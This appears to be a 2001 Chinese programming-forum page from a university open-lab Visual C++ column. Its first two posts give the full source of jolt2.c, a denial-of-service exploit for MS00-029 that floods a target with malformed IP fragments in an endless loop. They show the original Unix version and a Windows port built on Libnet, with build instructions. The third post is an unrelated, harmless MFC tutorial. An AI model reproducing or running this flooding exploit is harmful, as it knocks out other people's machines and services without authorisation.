【Visual C++】:在win平台发原始数据包实例(源程序)在win平台发原始数据包实例(源程序)
cloud (cloud) 2001-4-19 11:57:29
开放实验室 (openlab.nwpu.edu.cn) 【Visual C++】专栏
前几天受一个朋友相托从unix移植一个程序到windows而源程序使用了RAW_SOCKET
故只能用Libnet for nt改写
源程序如下:(改写后的程序令付)
/*
* File: jolt2.c
* Author: Phonix
* Date: 23-May-00
*
* Description: This is the proof-of-concept code for the
* Windows denial-of-serice attack described by
* the Razor team (NTBugtraq, 19-May-00)
* (MS00-029). This code causes cpu utilization
* to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
* Insert your name here if you think you wrote some of
* it. It's a trivial exploit, so I won't take credit
* for anything except putting this file together.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data;
}
pkt;
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck;
void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port]
dest_addr/n",
pname);
fprintf (stderr, "Note: UDP used if a port is specified,
otherwise ICMP/n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int bs, psize;
unsigned long x;
struct sockaddr_in to;
to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
memset(&pkt, 0, psize);
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190);
if (port)
{
pkt.proto.udp.source = htons(port|1235);
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9);
pkt.data = 'a';
}
else
{
pkt.proto.icmp.type = ICMP_ECHO;
pkt.proto.icmp.code = 0;
pkt.proto.icmp.checksum = 0;
}
while (1)
{
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
}
return bs;
}
int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0;
char hostname[32];
if (argc < 2)
usage (argv[0]);
gethostname (hostname, 32);
src_addr = host_to_ip(hostname);
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;
case 'p':
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;
case 'h':
default:
usage (argv[0]);
}
}
dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
quit("Bad destination address given.");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port);
}
-----------
【Visual C++】:在win平台发原始数据包实例(改写后)在win平台发原始数据包实例(改写后)
cloud (cloud) 2001-4-19 12:01:47
开放实验室 (openlab.nwpu.edu.cn) 【Visual C++】专栏
编译前须先下载libnet NT ftp://202.117.82.4
其自带一个tcpspoof的程序,编译参数和其一致但增加wsock32.lib
并添加定义
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* and microseconds */
};
/*
* File: jolt2.c
* Author: Phonix
* Date: 23-May-00
*
* Modified by cloud 2001-4-17
*
* Description: This is the proof-of-concept code for the
* Windows denial-of-serice attack described by
* the Razor team (NTBugtraq, 19-May-00)
* (MS00-029). This code causes cpu utilization
* to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
* Insert your name here if you think you wrote some of
* it. It's a trivial exploit, so I won't take credit
* for anything except putting this file together.
*/
#include
#include
#include /* for EOF */
#include /* for strchr() */
#define _next_char(string) (char)(*(string+1))
/* static (global) variables that are specified as exported by
getopt() */
char *optarg = NULL; /* pointer to the start of the option argument
*/
int optind = 1; /* number of the next argv[] to be evaluated */
int opterr = 1; /* non-zero if a question mark should be returned
when a non-valid option character is detected */
int getopt(int argc, char *argv[], char *opstring)
{
static char *pIndexPosition = NULL; /* place inside current argv
string */
char *pArgString = NULL; /* where to start from next */
char *pOptString; /* the string in our program */
if (pIndexPosition != NULL) {
/* we last left off inside an argv string */
if (*(++pIndexPosition)) {
/* there is more to come in the most recent argv */
pArgString = pIndexPosition;
}
}
if (pArgString == NULL) {
/* we didn't leave off in the middle of an argv string */
if (optind >= argc) {
/* more command-line arguments than the argument count */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* used up all command-line arguments */
}
/*---------------------------------------------------------------------
* If the next argv[] is not an option, there can be no more
options.
*-------------------------------------------------------------------*/
pArgString = argv[optind++]; /* set this to the next argument
ptr */
if (('/' != *pArgString) && /* doesn't start with a slash or a
dash? */
('-' != *pArgString)) {
--optind; /* point to current arg once we're done */
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* used up all the command-line flags */
}
/* check for special end-of-flags markers */
if ((strcmp(pArgString, "-") == 0) ||
(strcmp(pArgString, "--") == 0)) {
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* encountered the special flag */
}
pArgString++; /* look past the / or - */
}
if (':' == *pArgString) { /* is it a colon? */
/*---------------------------------------------------------------------
* Rare case: if opterr is non-zero, return a question mark;
* otherwise, just return the colon we're on.
*-------------------------------------------------------------------*/
return (opterr ? (int)'?' : (int)':');
}
else if ((pOptString = strchr(opstring, *pArgString)) == 0) {
/*---------------------------------------------------------------------
* The letter on the command-line wasn't any good.
*-------------------------------------------------------------------*/
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return (opterr ? (int)'?' : (int)*pArgString);
}
else {
/*---------------------------------------------------------------------
* The letter on the command-line matches one we expect to see
*-------------------------------------------------------------------*/
if (':' == _next_char(pOptString)) { /* is the next letter a
colon? */
/* It is a colon. Look for an argument string. */
if ('/0' != _next_char(pArgString)) { /* argument in this argv?
*/
optarg = &pArgString[1]; /* Yes, it is */
}
else {
/*-------------------------------------------------------------
* The argument string must be in the next argv.
* But, what if there is none (bad input from the user)?
* In that case, return the letter, and optarg as NULL.
*-----------------------------------------------------------*/
if (optind < argc)
optarg = argv[optind++];
else {
optarg = NULL;
return (opterr ? (int)'?' : (int)*pArgString);
}
}
pIndexPosition = NULL; /* not in the middle of anything */
}
else {
/* it's not a colon, so just return the letter */
optarg = NULL; /* no argument follows the option */
pIndexPosition = pArgString; /* point to the letter we're on */
}
return (int)*pArgString; /* return the letter that matched */
}
}
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data;
}
pkt;
u_char * ppkt = (u_char *) & pkt;
int network;
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck;
void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port]
dest_addr/n",
pname);
fprintf (stderr, "Note: UDP used if a port is specified,
otherwise ICMP/n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
// close(spf_sck);
// libnet_destroy_packet (&pkt);
exit(-1);
}
int do_frags (int sck, u_long src_addr, u_long dst_addr, u_short
port)
{
int bs, psize;
// unsigned long x;
struct sockaddr_in to;
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
libnet_init_packet (psize, &ppkt);
if (ppkt == NULL)
{
libnet_error (LIBNET_ERR_FATAL, "Failed./n");
}
network = libnet_open_raw_sock (IPPROTO_RAW);
if (network == -1)
{
libnet_error (LIBNET_ERR_FATAL, "Cannot open network./n");
}
to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;
memset(&pkt, 0, psize);
pkt.ip.ip_v = 4;
pkt.ip.ip_hl = 5;
pkt.ip.ip_len = htons((u_short) (iplen + icmplen )) + 40;
pkt.ip.ip_id = htons(0x455);
pkt.ip.ip_ttl = 255;
pkt.ip.ip_p = (port ? IPPROTO_UDP : IPPROTO_ICMP);
memcpy(&pkt.ip.ip_src , &src_addr,sizeof(struct in_addr));
memcpy(&pkt.ip.ip_dst , &dst_addr, sizeof(struct in_addr));
pkt.ip.ip_off = htons (8190);
if (port)
{
pkt.proto.udp.source = htons( (u_short) (port | 1235 ));
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9);
pkt.data = 'a';
if (libnet_do_checksum (ppkt, IPPROTO_UDP, LIBNET_UDP_H) == -1)
{
libnet_error (LIBNET_ERR_FATAL, "checksum failed/n");
}
}
else
{
pkt.proto.icmp.icmp_type = ICMP_ECHO;
pkt.proto.icmp.icmp_code = 0;
pkt.proto.icmp.icmp_cksum = 0;
if (libnet_do_checksum(ppkt, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H)
== -1)
{
fprintf(stderr, "Can't do checksum!/n");
}
}
while (1)
{
// bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
// sizeof(struct sockaddr));
libnet_write_ip (network, ppkt, psize);
}
return bs;
}
int main(int argc, char *argv[])
{
// int packet_size;
u_long src_addr, dst_addr;
int i, bs=1;
u_short port=0;
char hostname[32];
libnet_win32_init(1);
if (argc < 2)
usage (argv[0]);
gethostname (hostname, 32);
src_addr = host_to_ip(hostname);
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;
case 'p':
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;
case 'h':
default:
usage (argv[0]);
}
}
dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
quit("Bad destination address given.");
//spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
// if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
// sizeof(bs)) < 0)
// quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port);
libnet_destroy_packet (&ppkt);
}
-----------
无 云
【Visual C++】:脱离AppWizard和ClassWizard使用MFC脱离AppWizard和ClassWizard使用MFC
cloud (cloud) 2001-2-18 13:27:55
开放实验室 (openlab.nwpu.edu.cn) 【Visual C++】专栏
如果不喜欢AppWizard和ClassWizard产生的大量无用代码的话
我们可以脱离开他们,使用文本编辑器来创建我们的程序:
一个小小演示: stand.cpp
#define _AFXDLL
#define WIN32
//#define _UNICODE
#include<afxwin.h>
class CMyApp : public CWinApp //应用程序类
{
public :
virtual BOOL InitInstance(); //初始化,主要进行窗口创建工作
};
class CMyFrame : public CFrameWnd //窗口界面类
{
#define ID_NEW_MENUITEM 1004 //对应菜单元素New
#define ID_EXIT_MENUITEM 1005 //对应菜单元素Exit
#define ID_BUTTON 1006
private:
CMenu MainMenu; //主菜单(file);
CMenu FileMenu; //文件菜单(new,exit);
CButton MyButton;
public:
CMyFrame(); //窗口初始化
protected:
afx_msg void OnChar(UINT nChar, UINT nRepCnt, UINT nFlags); //处理键盘
事件
afx_msg void OnPaint();
//处理视图绘制
afx_msg int OnCreate(LPCREATESTRUCT lpCS);
//处理创建辅助控件
virtual BOOL PreCreateWindow(CREATESTRUCT & cs);
//处理窗口风格
void OnExitMenuItem(); //处理Exit菜单元素
void OnNewMenuItem(); //处理New菜单元素
void OnButton();
DECLARE_MESSAGE_MAP()
};
CString str; //用户键盘输入记录
CMyApp theApp; //应用程序对象
BOOL CMyApp::InitInstance() //应用程序初始化:创建窗口并显示
{
m_pMainWnd = new CMyFrame();
m_pMainWnd -> ShowWindow(m_nCmdShow);
m_pMainWnd -> Invalidate();
m_pMainWnd -> UpdateWindow();
return TRUE;
}
BEGIN_MESSAGE_MAP(CMyFrame,CFrameWnd) //开始消息映射
ON_WM_PAINT()
ON_WM_CHAR()
ON_WM_CREATE()
ON_COMMAND(ID_NEW_MENUITEM,OnNewMenuItem)
ON_COMMAND(ID_EXIT_MENUITEM,OnExitMenuItem)
ON_COMMAND(ID_BUTTON,OnButton)
END_MESSAGE_MAP()
CMyFrame::CMyFrame() //Frame初始化
{
Create(NULL,_T("Test"),WS_TILEDWINDOW,CRect(100,100,500,300) );
}
void CMyFrame::OnPaint()
//处理视图绘制
{
CPaintDC dc(this);
RECT rec;
GetClientRect(&rec);
dc.DrawText(str,&rec,DT_TOP | DT_LEFT);
}
void CMyFrame::OnChar(UINT nChar, UINT nRepCnt, UINT nFlags) //处理键盘事件:
记录击键
{
switch(nChar)
{
case _T('/b'):
str.Delete(str.GetLength()-1);
break;
default:
str += nChar;
}
Invalidate();
if(str.Right(5) == _T("exit/r") )
PostQuitMessage(0);
}
BOOL CMyFrame::PreCreateWindow(CREATESTRUCT & cs) //处理窗口风格
{
cs.lpszClass = AfxRegisterWndClass(NULL,LoadCursor(NULL,
IDC_ARROW),HBRUSH(COLOR_WINDOW+1),NULL);
return CFrameWnd::PreCreateWindow(cs);
}
int CMyFrame::OnCreate(LPCREATESTRUCT lpCreateStruct) //添加菜单栏等
{
MainMenu.CreateMenu();
FileMenu.CreatePopupMenu();
FileMenu.AppendMenu(MF_STRING, ID_NEW_MENUITEM, (LPCTSTR)"开始");
FileMenu.AppendMenu(MF_STRING, ID_EXIT_MENUITEM, (LPCTSTR)"退出");
MainMenu.AppendMenu(MF_POPUP,(UINT) FileMenu.m_hMenu, (LPCTSTR)"文
件");
SetMenu(&MainMenu);
MyButton.Create(_T("My button"), WS_CHILD|WS_VISIBLE,CRect
(10,70,100,100), this,ID_BUTTON);
return 0;
}
void CMyFrame::OnExitMenuItem() //处理推出菜单元素
{
PostQuitMessage(0);
}
void CMyFrame::OnNewMenuItem() //处理New菜单元素
{
AfxMessageBox(_T("New MenuItem Clicked !") );
}
void CMyFrame::OnButton()
{
AfxMessageBox("Button Clicked !");
}
编译方法:
cl stand.cpp /MD /c
link stand.obj /subsystem:windows
※编辑: cloud 于 2001-2-18 13:31:53 在 [202.117.82.4] 编辑本文
-----------
无 云
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
